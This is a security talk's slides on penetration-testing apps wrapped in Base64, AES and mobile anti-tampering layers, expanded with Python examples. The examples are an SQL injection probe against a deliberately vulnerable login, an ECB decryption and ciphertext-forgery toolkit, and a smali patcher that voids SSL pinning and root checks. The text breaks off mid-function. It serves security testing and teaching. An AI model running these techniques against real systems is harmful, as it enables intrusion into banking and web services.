We need to go deeper
Testing inception apps
Jakub Kaluzny
CONFidence, June 2019
DevSecOps
Diagram: a DAST scanner in the CI/CD pipeline, in front of an app whose form fields travel Base64-encoded:
  B64:  dXNlcm5hbWUK=YWRtaW4K&cGFzc3dvcmQK=YWJjCg%3d%3d
  HTTP: username=admin&password=abc
SQLi
Is it fixed?
Base64_decode(„YWJjCg==’ OR 1=1”)
The scanner appends its payload to the encoded value, so the server-side decode receives the quote and the OR instead of the query. The decode fails, nothing reaches SQL, the scan goes green, and the injection behind the decode is untouched.
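The DevSecOps slide in runnable form, as an added example that is not from the talk: an in-memory SQLite table, a login that Base64-decodes the form fields and then concatenates them into SQL, the parameterised version beside it, and a `dast_probe` helper that injects the classic `' OR 1=1 --` either onto the encoded blob, as a scanner without a payload-processing rule does, or before encoding. Table contents, function names and the `abc` password are constructed here; the encoded request body is the one on the slide.

```python
import base64
import binascii
import sqlite3
from urllib.parse import parse_qs, quote


def make_db() -> sqlite3.Connection:
    """Constructed user table for the demo (one row)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cr3t')")
    return con


def encode_form(fields: dict) -> str:
    """Client side as on the slide: field names and values Base64-encoded (with the trailing
    newline that `echo | base64` leaves behind) and URL-encoded into a form body."""
    enc = lambda s: quote(base64.b64encode((s + "\n").encode()).decode())
    return "&".join(f"{enc(k)}={enc(v)}" for k, v in fields.items())


def decode_form(body: str) -> dict:
    """Server side: strict Base64 decode of names and values. Anything that is not valid Base64
    is rejected here, before any SQL runs: this is where a scanner's raw payload dies."""
    dec = lambda s: base64.b64decode(s, validate=True).decode().rstrip("\n")
    return {dec(k): dec(v[0]) for k, v in parse_qs(body).items()}


def login_vulnerable(con: sqlite3.Connection, body: str) -> bool:
    """String-concatenated query: the injection is still there behind the Base64 layer."""
    try:
        f = decode_form(body)
    except (binascii.Error, UnicodeDecodeError):
        return False                              # generic failure, no SQL error to observe
    sql = (f"SELECT 1 FROM users WHERE username='{f.get('username', '')}' "
           f"AND password='{f.get('password', '')}'")
    return con.execute(sql).fetchone() is not None


def login_fixed(con: sqlite3.Connection, body: str) -> bool:
    """Same decoding, parameterised query: the fix the scanner should be confirming."""
    try:
        f = decode_form(body)
    except (binascii.Error, UnicodeDecodeError):
        return False
    row = con.execute("SELECT 1 FROM users WHERE username=? AND password=?",
                      (f.get("username", ""), f.get("password", ""))).fetchone()
    return row is not None


PAYLOAD = "' OR 1=1 --"    # the classic authentication-bypass probe


def dast_probe(login, con: sqlite3.Connection, *, decode_first: bool) -> bool:
    """What a DAST scanner does: inject PAYLOAD into the password field of a valid request.
    decode_first=False: payload appended to the Base64 blob (no payload-processing rule).
    decode_first=True:  payload inserted before encoding, i.e. the scanner was taught the
    transport encoding. Returns True when the login was bypassed."""
    if decode_first:
        body = encode_form({"username": "admin", "password": "abc" + PAYLOAD})
    else:
        body = encode_form({"username": "admin", "password": "abc"}) + quote(PAYLOAD)
    return login(con, body)


if __name__ == "__main__":
    db = make_db()
    print("raw payload on the blob  ->", dast_probe(login_vulnerable, db, decode_first=False))
    print("payload encoded first    ->", dast_probe(login_vulnerable, db, decode_first=True))
    print("same against the fix     ->", dast_probe(login_fixed, db, decode_first=True))
```

The scanner that appends to the blob gets `False` and no SQL error, so the pipeline goes green; the same scanner with a Base64 payload-processing rule (Burp Intruder has one) logs in without the password. Strict decoding (`validate=True`) is deliberate: with the default lenient decoder the outcome depends on how non-alphabet characters are discarded, which is exactly the kind of ambiguity a scanner cannot reason about.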
JAKUB KALUZNY
• 10 years in IT & Security
• Threat modeling,
DevSecOps, penetration
tests
• Poland, Spain, Australia
• banking, fintech, law, airline,
entertainment, e-commerce
• Speaker at BlackHat,
HackInTheBox, ZeroNights
Who
What is this all about?
Diagram: the same request, username=admin&password=abc, once as plain HTTP (readable in Wireshark) and once inside SSL.
Protection against what?
SSL protects against sniffing and Man-in-The-Middle.
It does nothing against SQL Injection, cross-user access control or business logic flaws.
Diagram: the request again, now Base64-encoded (dXNlcm5hbWUK=YWRtaW4K&cGFzc3dvcmQK=YWJjCg%3d%3d) inside HTTP inside SSL. To get back to username=admin&password=abc the tester needs a local HTTP proxy for the SSL layer, a custom script for the encoding layer, and Wireshark for the raw capture.
Inception apps
Diagram: the same request, wrapped deeper: AES encrypted (c6fa10bd98a6c4e778eac), inside a binary protocol, inside SSL; the key exchanged during activation; sent from an obfuscated mobile app with emulator and root/jailbreak detection.
• Raising the bar:
• For attackers?
• For testers?
• Money:
• Scoping a test?
• Risk
• Attack surface coverage?
• Security level?
Why?
• Technical examples
• Business consequences
• And discuss pentesting processes in general
What
LET’S GET TO IT
Example 1
Enterprise printers – Pull Printing
Diagram: WORKSTATION, PRINT SERVER, PRINTER
https://www.slideshare.net/wojdwo/hitb-kaluzny-final
In the middle of printers
Printers down under – AES
Hidden gem – SD card
Example 1 – decompiled JAR
• JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
• It’s the same everywhere!
• No remote firmware update!
Example 1
Attack flow: Threat actor → Sniff the communication → Get the SD card → Extract the key → Apply decryption → Crown jewels
In the middle of printers - revisited
Diagram: SERVER <-> PRINTER exchange as captured, with the size pattern of each message
  HELLO                     constant 263B
  HELLO, CERTIFICATE        96B, “X” B, 128B
  SESSION KEY               always different 64 B
  PostScript, ECB mode      many identical 16B blocks
ECB encryption mode for PostScript files
Each block encrypted separately, so the same 16-byte plaintext block always produces the same ciphertext block. The repeated blocks in the capture are the tell.
ECB is bad
https://en.wikipedia.org/wiki/ECB_mode
Attack flow: Threat actor → Sniff the communication → Communication analysis → Decryption script → Data extraction → Crown jewels
Access to plaintext files, no access control
MORE
Web app, AES comms, no key access
Diagram: the browser sends Action=buy&Product=137&name=Kaluzny to the web app and receives magic_string=abcdef1234567890…; it forwards the magic string to the API and gets msg=Hi%20Kaluzny&Price_for_you=1500.50 back. The key stays on the server side.
The magic string split into 16-byte blocks (32 hex characters each):
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string
magic_string=b0dc782f6bd9acce9bc3e9c8317b05125bb51d9cbc4bfa56d41d7db1489f9bbcc2cc45f774773e8adde9c41ecd62c5bc1faafa1d2553661c8b83012f7e968d511b3215b7764e11fbff4c1db3aa7325e479b31f1313d3c7bf78585f77f3f17dc69bb9650a3bfb6e9137e218c7267da6a57fcd28cc9074b00374cc42f224dd3
Appending the usual payload to it only corrupts the ciphertext:
magic_string=b0dc782f6bd9acce9bc3e9c8317bb6e9137e218c7267da6a57fcd28cc9074b00374cc42f224dd3’ OR 1=1
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Response: Hi Kaluznyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, your price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Response: Hi Kaluznyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, your price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa… (two ciphertext blocks swapped)
Response: Hi aaaaaaaaaaaaaaaKaluznyaaaaaaaaaaaaaaaaa, your price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =luznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
Encryption Oracle
Response: Hi KaluznyaaaaaaaaaaaaaaaaaaaaaaaaaaaX.Y.Z.A, your price is 1500.50
B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item”
5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500”
c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn”
c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us”
179762d5bba72ce4700aad2a96f5121d „er=admin&passwo”
e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=”
Encryption Oracle
031531894944dd25e457746a02f7eacf „&arbitrary=asd&&”
820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”
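The printer capture and the magic string rest on the same property of ECB: equal plaintext blocks give equal ciphertext blocks. As an added example, not code from the talk, the following Python puts both on one footing. `repeated_blocks` is the passive check that flagged the printer traffic ("many identical 16B blocks"); `BuyOracle`, `find_prefix_len`, `recover_suffix` and `forge_blocks` replay the magic-string attack: aligning the attacker-controlled `name`, recovering the hidden suffix one byte at a time, and cutting ciphertext blocks for chosen plaintext. The prefix `action=buy&item=137&price=1500.50&name=` and the suffix `&ip=X.Y.Z.A&user=admin&password=s3cr3t&path=` are taken from the slides; the key, the `&arbitrary=asd&` parameter and all function names are constructed here. The block cipher is a toy Feistel construction standing in for AES so that the example needs only the standard library; it is not secure and is used only because ECB attacks never look inside the block function.

```python
import hashlib

BLOCK = 16

# Toy 16-byte block cipher: a constructed stand-in for AES-128 (NOT secure). It keeps only what
# the attacks rely on: deterministic, invertible, fixed 16-byte blocks, no chaining under ECB.
def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _enc_block(key: bytes, blk: bytes) -> bytes:      # 4-round Feistel network
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r

def _dec_block(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r

def pad(data: bytes) -> bytes:                        # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def ecb_encrypt(key: bytes, data: bytes) -> bytes:
    data = pad(data)
    return b"".join(_enc_block(key, data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))

def ecb_decrypt(key: bytes, ct: bytes) -> bytes:
    pt = b"".join(_dec_block(key, ct[i:i + BLOCK]) for i in range(0, len(ct), BLOCK))
    return pt[:-pt[-1]]

# 1. Passive check on a capture: "many identical 16B blocks" (the printer traffic).
def repeated_blocks(ct: bytes) -> dict:
    """hex block -> count for every 16-byte block seen more than once; empty under CBC/CTR/GCM."""
    counts = {}
    for i in range(0, len(ct) - len(ct) % BLOCK, BLOCK):
        counts[ct[i:i + BLOCK]] = counts.get(ct[i:i + BLOCK], 0) + 1
    return {b.hex(): n for b, n in counts.items() if n > 1}

# 2. Active attack through the "magic string" (the web app / API case).
class BuyOracle:
    """The slide's web app: client chooses `name`, server appends fields the client is assumed
    never to read, and returns the ciphertext as magic_string."""
    PREFIX = b"action=buy&item=137&price=1500.50&name="

    def __init__(self, key: bytes, secret_suffix: bytes):
        self.key, self.secret = key, secret_suffix

    def magic_string(self, name: bytes) -> bytes:
        return ecb_encrypt(self.key, self.PREFIX + name + self.secret)

def find_prefix_len(oracle: BuyOracle) -> int:
    """Grow a run of 'a' until two adjacent ciphertext blocks coincide; where that first happens
    tells how many server-controlled bytes precede the attacker-controlled field."""
    for i in range(BLOCK):
        ct = oracle.magic_string(b"a" * (i + 2 * BLOCK))
        for j in range(len(ct) // BLOCK - 1):
            if ct[j * BLOCK:(j + 1) * BLOCK] == ct[(j + 1) * BLOCK:(j + 2) * BLOCK]:
                return j * BLOCK - i
    raise ValueError("no repeated block: not ECB")

def recover_suffix(oracle: BuyOracle, prefix_len: int) -> bytes:
    """Byte-at-a-time ECB decryption: choose the filler so exactly one unknown suffix byte sits
    at the end of a block, then ask the oracle which of the 256 candidates matches."""
    align = (-prefix_len) % BLOCK                # filler that reaches the next block boundary
    first = (prefix_len + align) // BLOCK        # first block fully under attacker control
    known = b""
    while True:
        k = len(known)
        filler = b"a" * (align + BLOCK - 1 - k % BLOCK)
        blk = first + k // BLOCK
        target = oracle.magic_string(filler)[blk * BLOCK:(blk + 1) * BLOCK]
        for guess in range(256):
            probe = oracle.magic_string(filler + known + bytes([guess]))
            if probe[blk * BLOCK:(blk + 1) * BLOCK] == target:
                known += bytes([guess])
                break
        else:                                    # nothing matched: we ran into the padding
            return known[:-1] if known.endswith(b"\x01") else known

def forge_blocks(oracle: BuyOracle, prefix_len: int, plaintext: bytes) -> bytes:
    """Cut-and-paste: valid ciphertext for attacker-chosen, block-aligned plaintext, obtained by
    placing it behind alignment filler and cutting the matching blocks out of the reply."""
    assert len(plaintext) % BLOCK == 0
    align = (-prefix_len) % BLOCK
    start = prefix_len + align
    return oracle.magic_string(b"a" * align + plaintext)[start:start + len(plaintext)]

def forge_request(oracle: BuyOracle, prefix_len: int, injected: bytes) -> bytes:
    """Complete forged magic string: the genuine server-prefix blocks, then attacker blocks that
    carry `injected` and end with valid PKCS#7 padding."""
    keep = (prefix_len // BLOCK) * BLOCK         # whole blocks that are pure server prefix
    return oracle.magic_string(b"Kaluzny")[:keep] + forge_blocks(oracle, prefix_len, pad(injected))
```

With a real AES-ECB oracle the only change is swapping `_enc_block`/`_dec_block` for the library call; `find_prefix_len` also doubles as an ECB detector for any oracle. Authenticated encryption (AES-GCM, or encrypt-then-MAC) closes the block games, but it does not fix the design problem on the slide: the server put `user=admin&password=s3cr3t` into a blob it handed to the client, so "credentials would never be sent unencrypted" was true and still not enough.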
Attack flow: Threat actor → Communication analysis → Encryption oracle → Tamper with parameters → Lateral movement → Crown jewels
Credentials would never be sent unencrypted
MITB MALWARE DETECTION IN JAVASCRIPT
MiTB malware - WebInjects
Diagram: the bank’s login page (<title>Bank</title> … Password: <input type=text>) as served, and the same page after the malware’s webinject has added <script src=//malware> to it.
MiTB malware detection in JS
Diagram: the bank now ships <script src=//antimalware> in the page, next to whatever the malware injected (<script src=//malware>).
JS-based MiTB malware detection
MiTB malware detection in JavaScript
• eval
• Obfuscation – base64, hex
• RSA encryption
• signatures
• reasoning engine
• Web Service
• rsa public key
https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence
@molejarka, @j_kaluzny
Attack flow: Threat actor → Deobfuscate JS → Extract RSA keys → Decrypt communication → Tamper with parameters → Crown jewels
TESTING MOBILE BANKING IN 2019
Mobile banking in early 2010s
Diagram: app → bank: Hi, I want to send $5; bank → app: OK. Standard SSL.
Attack flow – Android – inception level 1: Threat actor → Add local proxy CA → Tamper with parameters → Crown jewels
• Export CA from local proxy
• Push it to the device
• Intercept traffic
Android – inception level 1
Mobile banking in early 2010s
Diagram: the same exchange (Hi, I want to send $5 / OK), now with SSL pinning.
Modifying a hardcoded certificate:
• Unpack APK
• Change certificate in resources
• Pack the app, sign it
Attack flow – inception level 2: Threat actor → Bypass hardcoded SSL pinning checks → Set the proxy → Tamper with parameters → Crown jewels
• Decompile APK to Smali code
• „Void” the pinning methods or change the certificate:
  • Find the interesting methods
  • Delete the code, leaving „return-void” at the end
• Build it, sign it
Testing mobile banking in late 2010s, Poland
Diagram: pairing exchange
  App:  Hi, I want to pair a mobile app
  Bank: OK, let’s set a key for future encryption
  On the wire: 1c45a9eef01775077dac93add52595 / e81129f01a5072bad84aaaf8bcc51436
  Layers: SSL pinning; HTTP body encryption (payload=e47bf2dcd90af0d3366f4bacfe932ffae47bf2dcd90af0d33 inside the SSL-protected HTTP body); encrypted storage; APK/IPA integrity; emulator detection; root/jb detection
Attack flow – Android – 7 layers of inception: Threat actor → Bypass integrity checks → Bypass root detection → Bypass emulator detection → Bypass SSL pinning → Make encryption static → Develop Burp plugin → Tamper with parameters → Crown jewels
Attack flow – Android – inception levels 1/7 to 5/7
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
  • Second root check runs a minute after the first!
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
Example 4 – mobile banking in 2019, Poland
Diagram: the pairing exchange again (Hi, I want to pair a mobile app / OK, let’s set a key for future encryption; on the wire 1c45a9eef01775077dac93add52595 and e81129f01a5072bad84aaaf8bcc51436), behind SSL pinning, HTTP body encryption, encrypted storage, APK/IPA integrity, emulator detection and root/jb detection.
After the patch, the key-setting reply reads: The key will be 0000000000. With a known, static key the HTTP body encryption can be undone in a proxy plugin.
• Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
• Develop a custom Burp plugin
Attack flow – Android – inception level 6/7
Burp plugin – „Deszyfrator”
@slawekja
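The level 2 and level 1/7 to 6/7 lists describe the same edit applied to different checks: find the method, drop its body, leave a return. As an added example, not the speaker's tooling, a small Python patcher that does it on baksmali output. The smali excerpt is constructed (class, method and string names are invented for the demo); `void_methods` and `stub_body` are mine. It emits `return-void` for `V` methods as on the slide, and a false/0/null return for boolean, numeric and object-returning checks, which is what a root or emulator check usually needs.

```python
import re

# Constructed smali excerpt standing in for classes pulled out of a decompiled APK (the text
# apktool/baksmali produce). Class, method and string names are illustrative only.
SAMPLE_SMALI = """\
.class public Lcom/example/bank/SecurityChecks;
.super Ljava/lang/Object;

.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 2
    invoke-virtual {p0, p1}, Lcom/example/bank/SecurityChecks;->pinMatches([Ljava/security/cert/X509Certificate;)Z
    move-result v0
    if-nez v0, :cond_ok
    new-instance v1, Ljavax/net/ssl/SSLException;
    const-string v0, "certificate pin mismatch"
    invoke-direct {v1, v0}, Ljavax/net/ssl/SSLException;-><init>(Ljava/lang/String;)V
    throw v1
    :cond_ok
    return-void
.end method

.method public static isRooted()Z
    .locals 1
    const-string v0, "/system/xbin/su"
    invoke-static {v0}, Lcom/example/bank/SecurityChecks;->fileExists(Ljava/lang/String;)Z
    move-result v0
    return v0
.end method

.method public static signatureHash()Ljava/lang/String;
    .locals 1
    invoke-static {}, Lcom/example/bank/SecurityChecks;->computeHash()Ljava/lang/String;
    move-result-object v0
    return-object v0
.end method
"""

# Header line ".method ... name(params)RET", then everything up to the matching ".end method".
METHOD_RE = re.compile(r"^(?P<header>\.method[^\n]*\)(?P<ret>\S+))\n.*?^\.end method", re.M | re.S)


def stub_body(ret: str) -> str:
    """Smallest valid body for a return descriptor: the slide's 'return-void' for V, and
    false/0/null otherwise. '.locals' counts non-parameter registers only, so p0.. stay valid."""
    if ret == "V":
        return "    .locals 0\n    return-void\n"
    if ret in ("J", "D"):                         # wide primitives need a register pair
        return "    .locals 2\n    const-wide/16 v0, 0x0\n    return-wide v0\n"
    if ret[0] in "L[":                            # object or array reference -> null
        return "    .locals 1\n    const/4 v0, 0x0\n    return-object v0\n"
    return "    .locals 1\n    const/4 v0, 0x0\n    return v0\n"   # Z B S C I F -> false / 0


def void_methods(smali: str, names: set) -> tuple:
    """Replace the body of every method whose name is in `names`. Returns the patched smali and
    the list of method names actually patched, in file order."""
    patched = []

    def repl(m):
        header = m.group("header")
        name = header.split("(")[0].split()[-1]
        if name not in names:
            return m.group(0)
        patched.append(name)
        return f"{header}\n{stub_body(m.group('ret'))}.end method"

    return METHOD_RE.sub(repl, smali), patched


if __name__ == "__main__":
    out, done = void_methods(SAMPLE_SMALI, {"checkServerTrusted", "isRooted"})
    print("patched:", done)
    print(out)
```

After patching, rebuild and sign with your own key, as the slides say; the runtime signature comparison that then fails is the "integrity check" the first layer voids. Returning null from something like `signatureHash` usually crashes rather than bypasses: for value-returning checks, void the caller that compares the value, or return the constant it expects instead of 0.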
Attack flow – Android – inception level 7/7: Threat actor → Bypass integrity checks → Bypass root detection → Bypass emulator detection → Bypass SSL pinning → Make encryption static → Develop Burp plugin → Tamper with parameters → Crown jewels
You are in position to start testing
SOAP – Simple Object Access Protocol
Stack: SOAP → WCF BINARY XML → START-TLS → TCP
Let’s call it tnSOAP – totally not SOAP
mitm_relay for START-TLS
[thick client] ----▶ [mitm_relay] ----▶ [destination server]
| ▲
▼ |
[local proxy] < Intercept and
| ▲ modify traffic here
▼ |
[dummy webserver]
https://github.com/jrmdev/mitm_relay
WCF data – python-wcfbin by ERNW
[jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:m="http://www.example.org">
<soap:Header>
</soap:Header>
<soap:Body>
<m:GetStockPrice>
<m:StockName>GOOG</m:StockName>
</m:GetStockPrice>
</soap:Body>
</soap:Envelope>
00000000 43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01 |C.soap...soap...|
00000010 6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 |m.http://www.exa|
00000020 6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01 |mple.orgC.soap..|
00000030 43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63 |C.soap.j.GetStoc|
00000040 6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d |kPricej.StockNam|
00000050 65 9f 03 18 e3 86 01 01 01 |e........|
00000059
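The hexdump above is python-wcfbin's binary encoding of the envelope. As an added example, not part of the talk or of python-wcfbin, a small MC-NBFX decoder in Python that turns those 89 bytes back into XML. It implements the record types this message uses (dictionary and prefix elements, xmlns attributes, Chars8/Bytes8 text, EndElement) plus a few neighbours, and the static-dictionary entries it needs; everything else raises, so a new capture tells you at once which record type still needs implementing. Class and function names are mine; the byte string is the one from the hexdump.

```python
import base64
from xml.sax.saxutils import escape, quoteattr

# MC-NBFS static dictionary entries referenced by the captured message. Even IDs are static;
# odd IDs point into the per-session dictionary negotiated in the MC-NMF handshake, which a
# single captured message cannot resolve.
STATIC_DICT = {0: "mustUnderstand", 2: "Envelope", 4: "http://www.w3.org/2003/05/soap-envelope",
               6: "http://www.w3.org/2005/08/addressing", 8: "Header", 10: "Action", 12: "To", 14: "Body"}


class NbfxDecoder:
    """Decodes the MC-NBFX records a plain WCF binary SOAP message uses."""

    def __init__(self, data: bytes):
        self.d, self.p = data, 0

    def _u8(self) -> int:
        self.p += 1
        return self.d[self.p - 1]

    def _mb31(self) -> int:            # MultiByteInt31: 7 bits per byte, high bit = continue
        v = shift = 0
        while True:
            b = self._u8()
            v |= (b & 0x7F) << shift
            shift += 7
            if not b & 0x80:
                return v

    def _raw(self, n: int) -> bytes:
        self.p += n
        return self.d[self.p - n:self.p]

    def _str(self) -> str:             # MultiByteInt31 length, then UTF-8 bytes
        return self._raw(self._mb31()).decode("utf-8")

    def _dict(self) -> str:
        i = self._mb31()
        return f"{{session-dict:{i}}}" if i & 1 else STATIC_DICT.get(i, f"{{static-dict:{i}}}")

    def _element_name(self, t: int) -> str:
        if t == 0x40: return self._str()                                        # ShortElement
        if t == 0x41: return self._str() + ":" + self._str()                    # Element
        if t == 0x42: return self._dict()                                       # ShortDictionaryElement
        if t == 0x43: return self._str() + ":" + self._dict()                   # DictionaryElement
        if 0x44 <= t <= 0x5D: return chr(0x61 + t - 0x44) + ":" + self._dict()  # PrefixDictionaryElementA-Z
        if 0x5E <= t <= 0x77: return chr(0x61 + t - 0x5E) + ":" + self._str()   # PrefixElementA-Z
        raise ValueError(f"unexpected record 0x{t:02x} at offset {self.p - 1}")

    def _text(self, t: int) -> str:    # t with the WithEndElement bit (lowest bit) cleared
        if t == 0x98: return self._raw(self._u8()).decode("utf-8")                                 # Chars8Text
        if t == 0x9A: return self._raw(int.from_bytes(self._raw(2), "little")).decode("utf-8")    # Chars16Text
        if t == 0x9E: return base64.b64encode(self._raw(self._u8())).decode()                     # Bytes8Text
        if t == 0xAA: return self._dict()                                                          # DictionaryText
        fixed = {0x80: "0", 0x82: "1", 0x84: "false", 0x86: "true", 0xA8: ""}                    # ZeroText..EmptyText
        if t in fixed: return fixed[t]
        raise ValueError(f"unsupported text record 0x{t:02x} at offset {self.p - 1}")

    def _attributes(self) -> str:      # attribute records directly follow their element record
        out = ""
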